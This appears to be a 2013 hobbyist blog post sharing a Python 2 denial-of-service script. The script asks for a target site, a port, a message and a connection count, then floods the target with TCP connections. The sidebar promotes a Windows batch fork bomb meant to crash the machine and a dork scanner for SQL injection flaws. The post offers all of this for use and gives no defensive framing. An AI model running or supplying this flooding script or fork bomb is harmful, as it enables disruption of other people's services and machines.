import time import socket import os import sys import string #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# def restart_program(): python = sys.executable os.execl(python, python, * sys.argv) curdir = os.getcwd() #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~# print ("DDoS mode loaded") host=raw_input( "Site you want to DDoS:" ) port=input( "Port you want to attack:" ) message=raw_input( "Input the message you want to send:" ) conn=input( "How many connections you want to make:" ) ip = socket.gethostbyname( host ) print ("[" + ip + "]") print ( "[Ip is locked]" ) print ( "[Attacking " + host + "]" ) print ("+----------------------------+") def dos(): #pid = os.fork() ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: ddos.connect((host, 80)) ddos.send( message ) ddos.sendto( message, (ip, port) ) ddos.send( message ); except socket.error, msg: print("|[Connection Failed] |") print ( "|[DDoS Attack Engaged] |") ddos.close() for i in range(1, conn): dos() print ("+----------------------------+") print("The connections you requested had finished") if __name__ == "__main__": answer = raw_input("Do you want to ddos more?") if answer.strip() in "y Y yes Yes YES".split(): restart_program() else: os.system(curdir+"Deqmain.py") #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#Hope this was helpful ~Alex
Sunday, December 22, 2013
Basic Dos attack script in Python
Subscribe to:
Post Comments (Atom)
how to make a batch file to crash windows
here is the "code" %0|%0 paste that in a notepad and save it as whateveryou want.bat for example lol.bat by running this it...
-
Smartd0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors. It is based on...
-
So I have written 100 posts in under two months I think that this is a big achievment please follow and like this post so I can continue to...
-
Kali Linux although it sounds like slang for California, Kali through the phases of the penetration testing life cycle; one major tool fr...
No comments:
Post a Comment